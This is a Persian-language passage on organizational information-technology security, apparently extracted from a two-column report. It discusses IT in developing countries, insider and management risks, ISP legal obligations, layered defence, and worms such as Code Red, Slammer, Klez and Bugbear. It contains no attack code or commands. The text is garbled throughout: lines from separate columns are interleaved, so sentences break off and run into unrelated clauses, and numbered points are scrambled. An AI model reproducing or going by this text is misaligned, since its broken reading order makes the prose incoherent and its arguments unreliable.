ﺳﺎﺧﺘﺎﺭ ﻣﺴﻄﺢﺗﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ،ﻭ ﺍﻋﺘﻤﺎﺩ ﺑﻴﺸﺘﺮﻱ ﺑﻪ ﭘﺎﻳﮕﺎﻩ
٦UNDPﺩﺭ ﮔﺰﺍﺭﺵ ﺍﺧﻴـﺮ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻭﺿـﻌﻴﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋــﺎﺕ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺍﺭﻧــﺪ .ﺩﺭ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﻃـﺮﺡ ﻛﻠـﻲ ﺑﻌـﻀﻲ
ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑـﺰﺭﮒ ،ﺷـﻔﺎﻓﺘﺮ
ﭼﺎﻟﺸﻬﺎﻳﻲ ﻛﻪ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻋﺼﺮ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ
ﺑﺎﺷــﻨﺪ ﻭ ﻟــﺬﺍ ﺩﺭ ﭼﻨــﻴﻦ ﺳــﺎﺧﺘﺎﺭﻱ ﻛــﻪ ﺩﺭ ﺁﻥ ﺍﻳــﻦ ﻣﻘــﺪﺍﺭ ﺍﺯ
ﻫﺴﺘﻨﺪ ﭘﺮﺩﺍﺧﺖ ٧.ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭼﻨﺪ ﺳﺮﻱ ﮔﺰﺍﺭﺵ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ
ﺍﻃﻼﻋــﺎﺕ ﺷــﺮﻛﺖ ﺑــﺮﺍﻱ ﻫﻤــﺔ ﻛﺎﺭﻛﻨــﺎﻥ ﺩﺭ ﺩﺳــﺘﺮﺱ ﺍﺳــﺖ
ﺗﻮﺳﻌﻪ ﻭ ﺍﺳﺘﻘﺮﺍﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺍﺳـﺖ ٨.ﺍﮔﺮﭼـﻪ
ﻲ ﺫﺍﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ
ﺗﺠﺮﺑﻴﺎﺕ ﻓﻨﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺟﻬـﺎﻥ ﺻـﻨﻌﺘﻲ ﺍﺯ ﺑﻌـﻀﻲ ﺟﻬـﺎﺕ
ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﺪﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ
ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ )ﻣﻘﻴﺎﺱ ،ﻫﺰﻳﻨﻪﻫﺎ ،ﻭ ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﻛﻨـﺎﻥ( ،ﺍﻣﺎ ﺍﺯ
ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻳﺎ ﻣﺸﺎﻭﺭ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﻮﻳﺘﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺷـﺮﻛﺖ
ﻧﻘﺎﻁ ﻗﺪﺭﺕ ﻭ ﺿﻌﻒ ﺁﻧﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺍﺳﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﻪ ﺩﺭ ﻟﺒـﺔ
ﻣﻲﺗﻮﺍﻥ ﺩﺭﺳﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﮔﺮﻓﺖ .ﺗﻌﺪﺍﺩ ﻣﺆﺳﺴﺎﺕ ﺑﺰﺭﮒ ﻛﻤﺘﺮ
ﻓﻨﺎﻭﺭﻱ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨـﺪ ﺍﻳـﻦ ﺧﻄـﺮ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﺎﻟﻜﻴـﺖ
ﺍﺳﺖ ﻭ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﻭﻳـﮋﻩ ﻭ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭﺳـﻴﻌﺘﺮﻱ
ﻧﻮﺁﻭﺭﻳﻬﺎ ﻭ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺯ ﺳﺮﻗﺖ ﻳﺎ ﺗﺨﺮﻳﺐ
ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﻣﻴﺎﻥ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺘﻲ ﺑﻌﻨـﻮﺍﻥ
ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻣــﺴﺌﻮﻻﻥ ﻣﺮﺍﻛــﺰ ﻣﺨــﺎﺭﺝ ،ﻣــﺪﻳﺮﺍﻥ ﺍﺭﺷــﺪ ﻣــﺎﻟﻲ ﺑﻌﻨــﻮﺍﻥ
ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺍﻳـﻦ ﻣـﺸﻜﻼﺕ ،ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻛﻨﺘﺮﻝﻛﻨﻨﺪﮔﺎﻥ ﻫﺰﻳﻨﻪ ،ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺳﺎﺯﻣﺎﻥ )ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ
ﻣﺘﻮﺳﻂ ﺑﺎﻳﺪ ﻣﺮﻭﺭﻱ ﻛﺎﻣﻞ ﺑﺮ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ ،ﺍﻫﺪﺍﻑ ،ﺻـﻼﺣﻴﺘﻬﺎ ﻭ ٩
ﺍﻃﻼﻋﺎﺕ ،ﻓﺮﻭﺵ ﻭ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ،ﻭ ﻣﺤـﺼﻮﻻﺕ( ﺗﻨـﺸﻬﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺑﻲﺣﻔﺎﻅ ﻫﺴﺘﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺍﺯ ﺍﺻـﻮﻝ ﺍﻭﻟﻴـﺔ ﺍﺳـﺘﻔﺎﺩﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔـﺮ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻳﻲ
ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺎﺁﮔﺎﻫﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﺣﺘﻤﺎﻝ ﻣﻲﺭﻭﺩ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ ﻣﺨـﺎﻃﺮﺍﺕ
ﺍﺯ ﺭﺷﺪ ﻓﻨﻲ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ -ﻣﺜﻞ ﭼﻴﻦ -ﺑﺎ ﭘﺮﺍﻛﻨﺪﻩﺷـﺪﻥ ﻼ ﺣـﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺩﺭﺣـﺎﻝﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ -ﻣـﺜ ﹰ
ﻭﻳﺮﻭﺳــﻬﺎ ،ﻛﺮﻣﻬــﺎ ،ﺗﺮﺍﻭﺍﻫــﺎ ،ﻭ ﺗﻬﺪﻳــﺪﻫﺎﻱ ﭼﻨــﺪﻭﺟﻬﻲ ﻛــﻪ ﺗﻮﺳﻌﻪ -ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺤﺘﻤﻞ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ
ﺁﻣﻴﺨﺘﻪﺍﻱ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﻫﺴﺘﻨﺪ ﻣـﻮﺭﺩ ﺣﻤﻠـﺔ ﻣﻬـﺎﺟﻤﻴﻦ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻭ ﻃﺮﺣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﺗـﺄﺛﻴﺮ ﺁﻧﻬـﺎ ﺗـﺪﻭﻳﻦ
ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ. ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻫﺮ ﻧﺤﻮ ﺑﻪ ﺍﻣﻨﻴﺖ
ﺩﻭﻟﺖ ﻣﺮﺑﻮﻁ ﻣـﻲﺷـﻮﺩ -ﻣﺜـﻞ ﺍﺭﺍﺋـﻪ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﻳـﻚ ﻃﻴـﻒ ﺍﺯ ﺣﻔﺎﻇﺘﻬـﺎ ﺭﺍ ﺩﺭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ -ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﻭ
ﻣﻘﺎﺑﻞ ﺑﺮﻧﺎﻣﺔ ﺁﻟﻮﺩﻩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﺍﺯ ﺩﻓﺎﻉ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﭼﮕﻮﻧﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻗﺎﻧﻮﻧﻲ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺍﺣﻜـﺎﻡ ﺩﻭﻟﺘـﻲ ﺑـﺮ ﻋﻬـﺪﺓ
ﻫﻤﺔ ﺍﹶﺷﻜﺎﻝ ﺣﻤﻼﺕ ،ﻧـﺎﺗﻮﺍﻥ ﻫـﺴﺘﻨﺪ .ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ
ﺁﻧﻬﺎﺳﺖ .ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧـﺖ ) ١٠(ISPﻧﻤﻮﻧـﻪﺍﻱ
ﺩﻓﺎﻋﻲ ﭼﻨﺪﻻﻳﻪ ،ﻫﻢ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻨـﻲ ﻭ ﻫـﻢ ﺍﺯ ﻟﺤـﺎﻅ ﺍﻧـﺴﺎﻧﻲ
ﺍﺳﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳـﺖ .ﺑـﺎ
ﻣﺨﺎﻃﺮﺓ ﺑﺮﻭﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻮﺳـﻴﻠﺔ ﺑﺮﻧﺎﻣـﺔ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ
ﺍﺗﺼﺎﻝ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻣـﺸﺘﺮﻱ
ﺷﺪﺕ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ -ﻫﺮﭼﻨﺪ ﺑﺎﺯ ﻫﻢ ﺁﻧﺮﺍ ﺍﺯ ﺑـﻴﻦ ﻧﻤـﻲﺑـﺮﺩ.
ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ ﻣﺜﻞ ،Klez ،Slammer ،Code Red ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ،ﻭ ﺑﺎ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﻣﺤﺘﻮﻳـﺎﺕ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﺍﺑﺰﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ ISP ،ﺩﺭ ﻣﻌﺮﺽ ﺍﺣﻜـﺎﻡ ﻭ ﻣﻘـﺮﺭﺍﺕ
ﻭ Bugbearﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷــﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﻣــﻮﺭﺩ ﺁﺯﺍﺭ
ﻛﺸﻮﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺍﮔﺮ ﻛﺴﻲ ﻗﺎﺑﻠﻴﺖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ
ﻱ ﺧﻮﺩ ﺁﺛﺎﺭ ﻣﺨﺮﺏ ﺩﺍﺋﻤﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﺑﻪ ﺧﻮﺩ ﹺ
ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﻴﺎﻓﺰﺍﻳﺪ ،ﺗﻬﺪﻳﺪﺍﺕ ﺑﺎﻟﻘﻮﻩ ﻭ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ
ﻧﺪﺍﺭﻧﺪ ﺍﻣﺎ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺩﺍﻣﻬـﺎﻳﻲ ﻧـﺼﺐ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ
ﺍﺯ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺗﻌﻬﺪﺍﺕ ،ﺗﺒﺪﻳﻞ ﺑـﻪ ﻣـﺸﻜﻼﺗﻲ ﺑـﺴﻴﺎﺭ ﻋﻈـﻴﻢ ﻭ
ﻣﻲﺷﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺩﺍﻣﻬﺎ ﺁﺷﻨﺎ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﺒﻜﻪ
ﺍﺳﺎﺳﻲ ﻣﻲﺷﻮﻧﺪ.
ﺳﺮﻳﻊ ﻭ ﺁﺳﺎﻥ ﮔﺮﺩﺩ.
ﺟﺪﺍﻱ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠﺐ ،ﻛﺮﻣﻬﺎ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﺩﺭ ﻧـﺎﺗﻮﺍﻥ ﻛـﺮﺩﻥ ﺧﻄﺮﻫﺎﻱ ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﮔﺎﻧﻪ
ﺳﻴﺴﺘﻤﻬﺎ ﻣﺆﺛﺮﺗﺮ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻗﺎﺩﺭﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ
ﻱ ﭼﻨـﺪ ﻣﻨﺒـﻊ ﻣﻮﺛـﻖ ،ﻳـﻚ ﺭﻭﻧـﺪ ﺻـﻌﻮﺩﻱ ﺩﺭ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻣـﺎﺭ ﹺ
ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳــﺞ -ﻣﺜــﻞ ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ -ﺭﺍ ﻣــﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺟﻨـﺎﻳﻲ ﺭﺍ
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﮔﺰﺍﺭﺷـﺎﺕ ﻣﺘﻌـﺪﺩﻱ ﺑـﻪ ﭼﻨـﻴﻦ
ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﭼﻨﻴﻦ ﺧـﺼﻮﺻﻴﺎﺗﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻭﺟـﻮﺩ ﻣﻮﺿﻮﻋﺎﺗﻲ ﻣﺮﺑﻮﻁ ﺑﻮﺩ :ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣـﺔ
ﺩﺍﺭﺩ ،ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﻣﻮﺟـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺑـﺮﻭﺯ ﺁﻟﻮﺩﻩ ،ﺗﻐﻴﻴﺮ ﺷﻜﻞ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﺳﻴﺎﺳـﻲ،
ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳـﺐ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺍﻧﻔـﺮﺍﺩﻱ ،ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﺓ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ) ١١(DDoSﻋﻠﻴـﻪ ﺍﻫـﺪﺍﻑ
ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺗﻤـﺮﻳﻦ ﺷـﻮﺩ، ﺗﻌﻴﻴﻦﺷﺪﺓ ﺳﺎﺯﻣﺎﻧﻲ ،ﻭ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ.
ﻣﺨﺎﻃﺮﺓ ﻳﻚ ﺣﻤﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ
ﺑﻌﻼﻭﻩ ،ﮔﺴﺘﺮﺩﮔﻲ ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ ١٢ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ
ﻳﺎﺑﺪ ،ﺍﻣﺎ ﻣﺠﺪﺩﹰﺍ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻪ ﺻـﻔﺮ
ﻫﻤﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ .ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﻪ ﺣـﻮﺯﺓ
ﺭﺳﺎﻧﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻬﺪﻳـﺪ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻋﻤـﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﻧﺪﺍﺭﻧﺪ ﻭﻟﻲ ﺗﻤﺎﻡ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨـﺪ.
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳـﺖ ،ﺑﺮﺭﺳـﻲ ﻣﺨـﺎﻃﺮﺍﺕ
ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛــﺮﻡ Klezﺑــﺎ ﺧــﺼﻮﺻﻴﺎﺗﻲ ﺑــﻪ ﻧﮕــﺎﺭﺵ
ﺍﻣﻨﻴــﺖ ﺍﻧﻔــﺮﺍﺩﻱ ﻭ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻣــﺎﻟﻲ ﻭ ﭼﺎﻟــﺸﻬﺎﻱ ﺟﺪﻳــﺪ
ﺩﺭﺁﻣﺪﻩ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﻌﺘﻘﺪﻧﺪ ﻳﺎ ﺩﺭ ﭼـﻴﻦ ﻭ ﻳـﺎ
ﻱ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺩﺭ ﺑﺴﺘﺮﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍ ﹺ
ﺩﺭ ﻫﻨﮓﻛﻨﮓ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻛـﺸﻮﺭﻫﺎﻱ
ﺍﺳﺖ.
ﺁﺳﻴﺎﻳﻲ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻪ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺷﻮﻧﺪ ﻭ ﭼﻪ ﺧـﺎﺭﺝ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺠﻢ ﺯﻳﺎﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺳﺮﻋﺖ ﺯﻳﺎﺩ .۲
ﺑﺨﺶ ﺳﻮﻡ
ﺁﻥ ،ﺑــﺎﺯ ﻫــﻢ ﺗﻮﺳــﻌﻪ ﻭ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎ ،ﺳﻴﺎﺳــﺘﻬﺎ ،ﻭ ﻭ ﺑﺼﻮﺭﺕ ﺍﺭﺯﺍﻧﻘﻴﻤﺖ ﺗﻘﻮﻳﺖ ﻣﻲﺷﻮﺩ؛
ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻏﺎﻟﺐ ﺷﺮﻛﺘﻬﺎ ﭼﻴﺰﻱ ﺟﺰ ﺑﺮﻗﺮﺍﺭﻱ ﺗـﻮﺍﺯﻥ ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﻭ .۳
ﻣﻴﺎﻥ ﺿـﺎﺑﻄﻪﻫـﺎ ﻧﺨﻮﺍﻫـﺪ ﺑـﻮﺩ .ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ ،ﻣـﺪﻳﺮﺍﻥ ،ﻭ ﻣﺪﻳﺮﻳﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻫﻤﻴـﺖ ﺩﻫﻨـﺪ ﻭ ﺑـﺎ ﺗﻌﺮﻳـﻒ ﺍﻗﻼﻡ ﺩﺍﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﻣـﺎﻟﻲ ،ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮ ﺭﻓﺘـﺎﺭ
ﺍﻫﺪﺍﻑ ﺭﺳﻤﻲ ﻭ ﺭﺷﺪ ﺣﺪﺍﻗﻞ ﺳﺎﺯﻣﺎﻥ ،ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴـﺎﻥ ﻣﺸﺘﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻭ ﻓﺮﻭﺵ ،ﻭ ﺍﺭﺍﺋـﻪ ﺁﻣـﺎﺭ
